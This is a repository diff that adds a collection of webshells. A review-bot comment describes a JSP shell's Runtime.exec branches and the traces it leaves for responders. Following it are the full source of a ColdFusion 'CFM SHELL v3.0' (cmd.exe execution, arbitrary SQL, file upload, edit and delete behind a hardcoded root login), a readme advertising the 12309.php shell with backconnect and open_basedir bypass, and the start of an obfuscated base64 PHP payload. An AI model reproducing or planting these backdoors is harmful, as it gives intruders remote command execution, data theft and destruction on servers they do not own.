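Review bot: This page has no comments at all, and it performs no key check before the `do`, `cmd` and `clear` branches. A header comment should say what the three `c:when` branches do: `do` reaches `Runtime.exec` through reflection inside an EL expression and redirects output to `/tmp/shell`, `cmd` reads that file back through `java.util.Scanner`, and `clear` removes it. Those are also the traces a responder can look for: the fixed `/tmp/shell` path, a `/bin/bash -c` child of the application server, and the `?do=` / `?cmd=` / `?clear` request sequence issued by `startMagic()`. The `cmd` parameter is echoed into the page and the response fragment is assigned to `innerHTML` without escaping.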

2
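--- a/jsp/java/readme.md
+++ b/jsp/java/readme.md
@@ -0,0 +1,2 @@
+like:
+http://site/?do=cmd,/C,payload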

688
other/ololo.cfm Normal file

@ -0,0 +1,688 @@
<html>
<style type="text/css">
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{text-decoration: none;}
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<head>
<TITLE>CFM SHELL V3.0 edition</TITLE>
<meta http-equiv="Content-Type" content="text/html">
</head>
<body>
<center>
Cfm Shell v3.0 edition
</center>
<hr>
<script langauge="JavaScript" type="text/javascript">
function doMenu(item)
{
obj=document.getElementById(item);
col=document.getElementById("x" + item);
if (obj.style.display=="none")
{
obj.style.display="block"; col.innerHTML="[-]";
}
else
{
obj.style.display="none"; col.innerHTML="[+]";
}
}
</script>
<!--- Login --->
<cfif IsDefined("logout")>
<cfset structclear(cookie)>
<cflocation url="?" addtoken="No">
</cfif>
<cfif IsDefined("cookie.username")>
<!--- Main --->
<center>Username:<font color="#FFFF33"><b><cfoutput>#username#</cfoutput></b></font> !</center>
<center><b><a href="?logout">Logout</a></b></center>
<hr>
<cfoutput>
<cfset dir = #GetDirectoryFromPath(GetTemplatePath())#>
<cfif Right(dir, 1) neq "\" >
<cfset dir = "#dir#\">
</cfif>
<!--- Ham get Datasource Infor
<cfscript>
factory = CreateObject("java", "coldfusion.server.ServiceFactory");
DataSoureceInfo = factory.DataSourceService.getDatasources();
</cfscript> --->
<!--- Ham doc tep --->
<cffunction name="ReadFile" access="remote" output="true" returntype="any">
<cfargument name="fileread" type="string" required="true"/>
<cffile action="read" file="#arguments.fileread#" variable="line">
<cfoutput>#line#</cfoutput>
</cffunction>
<!--- ham xoa thu muc --->
<cffunction name="dirDelete" access="public" output="false" returntype="any">
<cfargument name="dir" required="no" default="#expandPath('/pocket_cache/')#">
<cfdirectory action="list" name="delfile" directory="#arguments.dir#">
<cfif delfile.RecordCount EQ 0>
<cfif directoryExists(arguments.dir)>
<cfdirectory action="delete" directory="#arguments.dir#">
</cfif>
<cfelse>
<cfloop query="delfile">
<cfif type EQ "file">
<cffile action="delete" file="#arguments.dir#\#name#">
<cfelse>
<cfset temp = dirDelete(arguments.dir & '\' & #delfile.name#)>
</cfif>
</cfloop>
<cfif directoryExists(arguments.dir)>
<cfdirectory action="delete" directory="#arguments.dir#">
</cfif>
</cfif>
</cffunction>
<!--- ham doi ten thu muc --->
<cffunction name="renameDirectory" access="remote" output="false" returntype="void">
<cfargument name="oldDir" type="string" required="true"/>
<cfargument name="newDir" type="string" required="true"/>
<cfdirectory action="rename" directory="#arguments.oldDir#" newdirectory="#arguments.newDir#"/>
</cffunction>
</cfoutput>
<!--- bat dau nhan lenh --->
<cfif isDefined("action")>
<cfif action is "goto">
<cfoutput>
<cfif isDefined("scr")>
<cfset dir = #scr#>
<cfif Right(dir, 1) neq "\" >
<cfset dir = "#dir#\">
</cfif>
</cfif>
</cfoutput>
<cfelseif action is "edit">
<cfoutput>
<cfif isDefined("scr")>
<cfif FileExists("#scr#")>
<cfset file_name=#Replace(#scr#,'#GetDirectoryFromPath(scr)#','','ALL')#>
<title>&##272;ang s&##7917;a t&##7879;p #scr#</title>
<script language="JavaScript" type="text/javascript">
function sTrim(sVariable)
{
return sVariable.replace(/^\s+|\s+$/g,"");
}
function validateFields(form)
{
return true;
}
</script>
<cffile action="read" file="#scr#" variable="thisFile">
<h1>Edit file:</h1>
<div class=content>
<form action="?action=save&scr=#GetDirectoryFromPath(scr)#" method="post" onsubmit="return validateFields(this);">
<input type="hidden" name="fileName" value="#file_name#" />
<input type="hidden" name="action_type" value="edit" />
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File path:
</td>
<td>
#scr#
</td>
</tr>
<tr>
<td>
<cfset thisFile=#Replace(#thisFile#,'<','<','ALL')#>
<cfset thisFile=#Replace(#thisFile#,'>','>','ALL')#>
<textarea class="bigarea" name="fileContent">#thisFile#</textarea>
</td>
</tr>
<tr>
<td>
<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
</td>
</tr>
</form></div>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "cut">
<cfoutput>
<cfif isDefined("scr")>
<cfset cutdir = #scr#>
<cfif FileExists("#scr#")>
<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
<cfloop condition = "Right(cutdir, 1) neq '\'">
<cfset cutdir = #RemoveChars(cutdir, len(cutdir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; di chuy&##7875;n t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#cutdir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("thumucsechuyen")>
<cffile action="move" source="#scr#" destination="#thumucsechuyen#">
<cflocation url="?action=goto&scr=#cutdir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#cutdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "copy">
<cfoutput>
<cfif isDefined("scr")>
<cfset copydir = #scr#>
<cfif FileExists("#scr#")>
<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
<cfloop condition = "Right(copydir, 1) neq '\'">
<cfset copydir = #RemoveChars(copydir, len(copydir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; sao ch&##233;p t&##7879;p <font color="red">#scr#</font> t&##7899;i <cfinput type="text" name="thumucsechuyen" size="50" value="#copydir#"> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("thumucsechuyen")>
<cffile action="copy" source="#scr#" destination="#thumucsechuyen#">
<cflocation url="?action=goto&scr=#copydir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#copydir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "rename">
<cfoutput>
<cfif isDefined("scr")>
<cfset renamedir = #scr#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(renamedir, 1) neq '\'">
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
</cfform>
<cfif isDefined("namechange")>
<cffile action="rename" source="#scr#" destination="#renamedir##namechange#">
<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
</cfif>
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "renamed">
<cfoutput>
<cfif isDefined("scr")>
<cfset renamedir = #scr#>
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
<cfif DirectoryExists("#scr#")>
<cfloop condition = "Right(renamedir, 1) neq '\'">
<cfset renamedir = #RemoveChars(renamedir, len(renamedir), 1)#>
</cfloop>
<cfform name="articles" ENCTYPE="multipart/form-data">
Rename #renamedir#<cfinput type="text" name="namechange" size="25" value=""> <input type="submit" value="Rename" />
</cfform>
<cfif isDefined("namechange")>
#renameDirectory('#scr#','#renamedir##namechange#')#
<cflocation url="?action=goto&scr=#renamedir#" addtoken="No">
</cfif>
<cfelse>
<p>Th&##432; m&##7909;c #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#renamedir#" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- ..</u></a>
</cfif>
</cfoutput>
<cfelseif action is "down">
<cfoutput>
<cfif isDefined("scr")>
<cfset downdir = #scr#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(downdir, 1) neq '\'">
<cfset downdir = #RemoveChars(downdir, len(downdir), 1)#>
</cfloop>
<cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath (scr)#">
<cfcontent file="#scr#" type="application/octet-stream">
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#downdir#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "del">
<cfoutput>
<cfif isDefined("scr")>
<cfset deletedir = #scr#>
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
<cfif FileExists("#scr#")>
<cfloop condition = "Right(deletedir, 1) neq '\'">
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
</cfloop>
<cffile action="delete" file="#scr#">
<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
<cfelse>
<p>T&##7853;p tin #scr# kh&##244;ng t&##7891;n t&##7841;i.</p>
</cfif>
<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
</cfif>
</cfoutput>
<cfelseif action is "deld">
<cfoutput>
<cfif isDefined("scr")>
<cfset deletedir = #scr#>
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
<cfif DirectoryExists("#scr#")>
<cfloop condition = "Right(deletedir, 1) neq '\'">
<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
</cfloop>
<cfset dirDelete('#scr#')>
<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
<cfelse>
<p>DeleteDir</p>
</cfif>
<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
</cfif>
</cfoutput>
<cfelseif action is "new">
<!---
<cfoutput>
<cfif isDefined("scr")>
<cfif FileExists("#scr#")>
<p>T&##7853;p tin #scr# &##273;&##227; t&##7891;n t&##7841;i.</p>
<cfelse>
<cfform name="articles" ENCTYPE="multipart/form-data">
B&##7841;n s&##7869; t&##7841;o th&##432; m&##7909;c m&##7899;i #scr#<cfinput type="text" name="namecreate" size="25" value=""> <input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
<cfif isDefined("namecreate")>
<cffile action = "write" file = "#scr##namecreate#" output = "">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
--->
<cfoutput>
<cfif isDefined("scr")>
<cfdirectory action="list" directory="#scr#" name="fileList">
<script language="JavaScript" type="text/javascript">
var fileArray = new Array(<cfoutput>#quotedValueList(fileList.name)#</cfoutput>);
function sTrim(sVariable)
{
return sVariable.replace(/^\s+|\s+$/g,"");
}
function validateFields(form)
{
var fileCount = 0;
var re = /.txt$|.cfm$|.cfml$|.htm|.html$/;
if (sTrim(form.fileName.value) == "")
{
alert('Can nhap ten tep');
form.fileName.focus();
return false;
}
if (form.fileName.value.search(re) < 0)
{
alert('Khong chap nhan tep loai nay!\n\n Chi chap nhan .cfm, .cfml, .htm, .html, va .txt!');
form.fileName.focus();
form.fileName.select();
return false;
}
for (var i=0; i<fileArray.length; i++)
{
if (sTrim(form.fileName.value) == fileArray[i])
{
fileCount++;
}
}
if (fileCount > 0)
{
alert('Ten nay da ton tai, vui long chon tep khac');
form.fileName.focus();
form.fileName.select();
return false;
}
return true;
}
</script>
<form action="?action=save&scr=#scr#" method="post" onsubmit="return validateFields(this);">
<input type="hidden" name="action_type" value="add" />
<table border="0" style="width:400px;">
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File name:
</td>
<td>
<input type="text" name="fileName" style="font-family:verdana; font-size:11px; width:316px;" />
</td>
</tr>
<tr>
<td style="font-weight:bold;" nowrap="nowrap">
File content:
</td>
<td colspan="2">
<textarea name="fileContent" style="font-family:verdana; font-size:11px; height:250px; width:600px;"></textarea>
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right;">
<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
</td>
</tr>
</table>
</form>
<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "newd">
<cfoutput>
<cfif isDefined("scr")>
<cfform name="articles" ENCTYPE="multipart/form-data">
New dir: <cfinput type="text" name="namecreate" size="25" value="#GetDirectoryFromPath(scr)#"> <input type="submit" value="Create new dir" />
</cfform>
<cfif isDefined("namecreate")>
<cfdirectory directory= "#scr##namecreate#" action="create">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "upload">
<cfoutput>
<cfif isDefined("scr")>
<cfform enctype="multipart/form-data" method="post">
Upload file to path: <font color="red">#scr#</font><br>
Choose file: <input type="file" size="80" name="fileup" /> <input type="submit" value="Upload" /><br/>
</cfform>
<cfif isDefined("fileup")>
<cffile action="upload" fileField="fileup" destination="#scr#" nameconflict="overwrite">
<cflocation url="?action=goto&scr=#scr#" addtoken="No">
</cfif>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "cmd">
<cfoutput>
<cfif not isDefined("patch")>
<cfif FileExists("#GetDirectoryFromPath(GetTemplatePath())#cdm.exe")>
<cfset patch = "#GetDirectoryFromPath(GetTemplatePath())#cmd.exe">
<cfset out = "#GetDirectoryFromPath(GetTemplatePath())#out.txt">
<cfelseif FileExists("C:\windows\system32\cmd.exe")>
<cfset patch = "C:\windows\system32\cmd.exe">
<cfset out = "C:\windows\system32\out.txt">
<cfelseif FileExists("C:\winnp\system32\cmd.exe")>
<cfset patch = "C:\winnp\system32\cmd.exe">
<cfset out = "C:\winnp\system32\out.txt">
<cfelse>
<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
<p>Khai b&##225;o bi&##7871;n patch l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p cmd.exe</p>
<p>Khai b&##225;o bi&##7871;n out l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p d&##7919; li&##7879;u</p>
<cfset sai = 1>
</cfif>
<cfelseif FileExists("#patch#")>
<cfset out = "#GetDirectoryFromPath(patch)#out.txt">
<cfelse>
<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
</cfif>
<cfif not isDefined("sai")>
<cfform name="articles" ENCTYPE="multipart/form-data">
Enter command: <cfinput type="text" name="command" size="25" value=""> <input type="submit" value="Run" />
</cfform>
<cfif isDefined("command")>
<p>Results:</p>
<cfexecute name="#patch#" arguments="/C #command# > #out#" timeout="60"></cfexecute>
#ReadFile('#out#')#
#out#
<cfif FileExists("#out#")>
<cffile action="delete" file="#out#">
</cfif>
</cfif>
</cfif>
<br>
<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
<cfelseif action is "datainfo">
<cfoutput>
<cfdump var="#DataSoureceInfo#">
<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
<cfelseif action is "save">
<cfoutput>
<cfif isDefined("form.fileName")>
<title>&##272;&##227; l&##432;u t&##7879;p</title>
<cffile action="write" file="#scr#\#form.fileName#" output="#form.fileContent#" addnewline="no">
&##272;&##227; <cfif form.action_type IS "edit">s&##7917;a<cfelse>t&##7841;o</cfif> th&##224;nh c&##244;ng t&##7879;p <span style="font-weight:bold;">#form.fileName#</span>.<br>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
<cfelse>
<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfif>
</cfoutput>
<cfelseif action is "sql">
<cfoutput>
<cfform name="articles1" ENCTYPE="multipart/form-data">
DataBase Name:
<cfif isDefined("database")>
<cfinput type="text" name="database" size="25" value="#database#"><br>
<cfelseif IsDefined("DS")>
<cfinput type="text" name="database" size="25" value="#DS#"><br>
<cfelse>
<cfinput type="text" name="database" size="25" value=""><br>
</cfif>
SQL query: <cfinput type="text" query="SQL" name="query" size="130" value=""><br>
<input type="submit" value="Th&##7921;c hi&##7879;n" />
</cfform>
</cfoutput>
<cfif isDefined("database") and isDefined("query")>
<cfquery name="SQL" DataSource="#database#">
#preserveSingleQuotes(query)#
</cfquery>
<br>
<table width="90%" border="1" align="center">
<tr><td align="center">M?u h?i: <font color="red"><cfoutput>#query#</cfoutput></font></td></tr>
<tr><td align="center">K?t qu? tr? v?:</td></tr>
<tr><td><cfdump var="#SQL#" format="text" label="Ket qua"></td></tr>
</table>
<br>
</cfif>
<cfoutput>
<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
</cfoutput>
</cfif>
<cfelse>
<cfset action = "goto">
</cfif>
<cfif action is "goto" or action is "del" or action is "deld">
<cfoutput>
<center><a href="javascript:doMenu('thongtin');" id=xthongtin>[-]</a>Server info:</center>
<div id="thongtin">
<!--- Lay thong tin ip --->
<cfif #cgi.http_x_forwarded_for# eq "">
<cfset clientip="#cgi.remote_addr#">
<cfelse>
<cfset clientip="#cgi.http_x_forwarded_for#">
</cfif>
<!--- In thong tin server --->
<span>Server IP:</span> #CGI.HTTP_HOST#:#CGI.SERVER_PORT#</span> - <span>Client IP:</span> #clientip#<br>
<span>Gateway Interface:</span> #CGI.GATEWAY_INTERFACE# - <span>Server Name:</span> #CGI.SERVER_NAME#:#CGI.SERVER_PORT#<br>
<span>Server Protocol:</span> #CGI.SERVER_PROTOCOL# - <span>Server Software:</span> #CGI.SERVER_SOFTWARE#<br>
<span>Appserver:</span> #server.coldfusion.appserver# - <span>Expiration:</span> #DateFormat(server.coldfusion.expiration, "d/m/yy")# #TimeFormat(server.coldfusion.expiration, "HH:mm:ss")#<br>
<span>Product Name:</span> #server.coldfusion.productname# - <span>Product Level:</span> #server.coldfusion.productlevel# - <span>Product Version:</span> #server.coldfusion.productversion#<br>
<span>Server OS Arch:</span> #server.os.arch# - <span>Server OS Name:</span> #server.os.name# - <span>Server OS Version:</span> #server.os.version#<br>
</div>
<hr>
<!--- Thu tao Object
<cftry>
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
<cfcatch type="any">
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
</cfcatch>
</cftry>
--->
<hr>
<center><a href="javascript:doMenu('congcu');" id=xcongcu>[-]</a>Main:</center>
<div id="congcu">
Path: #dir#<br>
Operations: <a href="?action=new&scr=#dir#">NewFile</a> - <a href="?action=newd&scr=#dir#">NewDir</a> - <a href="?action=upload&scr=#dir#" title="T&##7843;i l&##234;n m&##7897;t t&##7879;p t&##7915; m&##225;y t&##237;nh c&##7911;a b&##7841;n">Upload file</a> - <a href="?" title="Tr&##7903; v&##7873; th&##432; m&##7909;c ch&##7913;a Shell">---</a><br>
Actions: <a href="?action=cmd" title="Th&##7921;c thi l&##7879;nh Command Dos">CMD</a> - <a href="?action=sql&scr=#dir#" title="Th&##7921;c thi l&##7879;nh SQL query">SQL</a> - <a href="?action=datainfo" title="Th&##244;ng tin C&##417; S&##7903; D&##7919; Li&##7879;u">Datainfo CSDL</a>
</div>
<hr>
<h1>File manager:</h1>
<div id="thumuc">
</cfoutput>
<cfdirectory directory="#dir#" name="myDirectory" sort="type ASC" >
<div class=content>
<table width=100% class=main cellspacing=0 cellpadding=1><tr><th width='13px'><input type=checkbox class=chkbx name=ch11'></th><th>Name</th><th>Size</th><th>Modify</th><th>Chmod</th><th>Mode</th><th>Actions</th></tr>
<cfoutput>
<cfif len(dir) gt 3>
<tr>
<cfset updir = #dir#>
<cfset updir = #RemoveChars(updir, len(updir), 1)#>
<cfloop condition = "Right(updir, 1) neq '\'">
<cfset updir = #RemoveChars(updir, len(updir), 1)#>
</cfloop>
<th class=chkbx><input type=checkbox width='13px' class=chkbx></th><td width="20%"><strong><a href="?action=goto&scr=#updir#">..</a></strong></td>
</tr>
</cfif>
</cfoutput>
<cfset x=1>
<cfoutput query="myDirectory">
<cfif x EQ 2>
<tr class=l2><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
</cfif>
<cfif x EQ 1>
<tr class=l1><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
</cfif>
<cfif x EQ 1>
<cfset x=2>
<cfelse>
<cfset x=1>
</cfif>
<td>
<cfif #Type# is "Dir">
<a href="?action=goto&scr=#dir##Name#\"><b>[#Name#]</b></a>
<cfelse>
<a href="?action=edit&scr=#dir##Name#\">#Name#</a>
</cfif>
</td>
<td>
<cfif #type# is "Dir">
<Dir>
<cfelseif #Size# LT 1024>
#Size# B
<cfelseif #Size# LT 1024*1024>
#round(Size/1024)# KB
<cfelseif #Size# LT 1024*1024*1024>
#round(Size/1024/1024)# MB
<cfelseif #Size# LT 1024*1024*1024*1024>
#round(Size/1024/1024/1024)# GB
<cfelseif #Size# LT 1024*1024*1024*1024*1024>
#round(Size/1024/1024/1024/1024)# TB
</cfif>
</td>
<td>
#DateFormat(DateLastModified, "d/m/yy")# #TimeFormat(DateLastModified, "HH:mm:ss")#
</td>
<td>#Attributes#</td>
<td>#Mode#</td>
<td>
<cfif #Type# is "File">
<a href="?action=edit&scr=#dir##Name#">Edit</a>|<a href="?action=cut&scr=#dir##Name#">Cut</a>|<a href="?action=copy&scr=#dir##Name#">Copy</a>|<a href="?action=rename&scr=#dir##Name#">Rename</a>|<a href="?action=down&scr=#dir##Name#">Download</a>|<a href="?action=del&scr=#dir##Name#" onCLick="return confirm('Delete #Name# ?')">Delete</a>
<cfelse>
<a href="?action=cutd&scr=#dir##Name#\">Cutdir</a>|<a href="?action=copyd&scr=#dir##Name#\">Copy</a>|<a href="?action=renamed&scr=#dir##Name#\">Rename</a>|<a href="?action=deld&scr=#dir##Name#\" onCLick="return confirm('Delete #Name# ?')">DeleteDir</a>
</cfif>
</td>
</tr>
</cfoutput>
</table></div>
</div>
</cfif>
<!--- End Main --->
<cfelseif Not IsDefined("cookie.username")>
<cfform name="articles" ENCTYPE="multipart/form-data">
<center><table width="300" border="0">
<tr>
<td width="50">Username:</td>
<td width="50"><input type="text" name="username"></td>
</tr>
<tr>
<td width="50">Password:</td>
<td width="50"><input type="password" name="password"></td>
</tr>
<tr>
<td width="50">Remember you?:</td>
<td width="50">
<input type="checkbox" name="RememberMe" value="Yes" checked>
<input type="submit" name="Process" value="Login">
</td>
</tr>
</table></center>
</cfform>
<cfif IsDefined("username")>
<cfset member_username = "root">
<cfset member_password = "a619d974658f3e749b2d88b215baea46">
<cfif #username# neq #member_username#>
<center>Wrong username!</center>
<cfset structclear(cookie)>
<cfelseif hash(form.password, "MD5") neq #member_password#>
<center>Wrong password!</center>
<cfset structclear(cookie)>
<cfelse>
<cfif IsDefined("RememberMe")>
<cfset member_password1 = hash(form.password, "MD5")>
<cfcookie name="username" value="#form.username#" expires="NEVER">
<cfcookie name="password" value="#member_password1#" expires="NEVER">
<cfelse>
<cfset member_password1 = hash(form.password, "MD5")>
<cfcookie name="username" value="#form.username#">
<cfcookie name="password" value="#member_password1#">
</cfif>
<cflocation url="?" addtoken="No">
</cfif>
</cfif>
</cfif>
<!--- End Login --->
<hr>
</body>
</html>

2066
php/12309/12309.php.txt Normal file

File diff suppressed because it is too large Load diff

22
php/12309/readme.md Normal file

@ -0,0 +1,22 @@
site: https://github.com/kairn/12309.php
DESCRIPTION:
12309.php is advanced webshell with the main aim at executing shell commands in all possible ways. it has some additional functions though.
FEATURES:
- you could choose desired function to execute code with (+pcntl_exec +ssh2_exec)
- internal Perl, Python and SSI mini-webshells - save them to disk and run, if php system functions are disabled
- backconnect/bind port on PHP, Python, and "classic" perl and C backconnect/bind. Also there are several small one-line backconnects on different languages, useful too coz they do not need to save temporary file somewhere
- fully interactive backconnect on Python (yes, you can run even vim & mc via backconnect!)
- on old php versions (such as 5.1.6, 5.2.9) this script could bypass open_basedir and read other users` files (if you`re running it with webserver`s rights, i.e. kind of apache-mpm-prefork or -worker, not kind of -itk or -peruser, and if your account is not in chroot/jail). Also there is ability to read files with mysql and with usual file_get_contents
- nice extra functions (file manager, file editor, system info, text coders/decoders, local open ports scanner, etc)
LICENSE:
3-clause BSD:
http://en.wikipedia.org/wiki/BSD_licenses#3-clause_license_.28.22New_BSD_License.22_or_.22Modified_BSD_License.22.29
Copyright © 2010-2011, 12309, jabber: z12309@exploit.im, url: https://github.com/kairn/12309.php
parts of code are licensed under GPL, CC, BSD, WTFPL. if your religion forbids using one of these licenses, do not use this script.
THANKS:
thanks for your help: Tidus, Shift, pekayoba, Zer0, ForeverFree, r00nix
and all people whose code i borrowed: Endeveit, Michael Schierl, b374k, tex, ont.rif, oRb, Eric A. Meyer, Eugen, profexer, Bernardo Damele, Michael Foord, security-teams.net, pentestmonkey.net, metasploit.com

255
php/pas/pas.php Normal file

@ -0,0 +1,255 @@
<?php $g___g_='base'.(32*2).'_de'.'code';$g___g_=$g___g_(str_replace("\n", '', 'E7BstEFmF0mWo7bWiJpZiSncg4cJwxGvG6TREJxxDwgGU9xIJsbHISO8VswX71OY7SunXTsz37hHfhHB
nrjFFHG8nJ/PCbYaLRGtQrnqa/GFo2Ze2M2ANGO/HsLXxi8rEQBh3AvF/Fb96KIRTcEdNq3qyTIGloRb
nPh1eZjdYeOYcYc2wTQxGIOgB9TeWZjEXT8yuDJPAIfUbPXpHl1kdeqE9RgH+fRZxLUpI7FRzDnSu7R8
pXcHfoO0qfFe1whsnvj72Pas8t6vzVpU/5OEcjjzgdoMSCZvSNjJIiUkkYe23r9oSaM96RQkNxvFz1nB
XPFAWJk/jLc3FwkZ67up77x9N81i5qcPmsIktWupqpXlIVgKvmhfU9alXVmqyu2XliUszopVH5WbBJ0k
mvEhrE6U1iV+kY/0ReXr4xXWc0DT2doii7MTCTqetKNAMJ7ohAm0Rf4zLq/RMM7LptYC5xmIO8JSCFuk
ZNm9Iy8qvDxJR88B9QIt1jIN4SxhLCIlz0n/glJVnkyFQjNHkz3Fd3nR9US2dTUcT/aQi4rsGZ71x89y
XXfeNIW5+UkXd4JdmRarb876//QxpxnmPcPEauphYh8TQLn2KOtBlBH8wFCdYfGl6xgkkLw7LSTAM9ca
vD/X2P5sAEBcOpT5Duewy2uUluiGWDAJKkxMb4BgnM5h8bEC/fu45/+q7L30Z+RX/CUKrBsozcX8xp+Q
yPdCA0RMW5kHWE0uSwiqcNq8WyLDg//ngTy06OAa2PpudDY9ccdkwG2J/Am9LBnme8FyGBgwQnpOmvxT
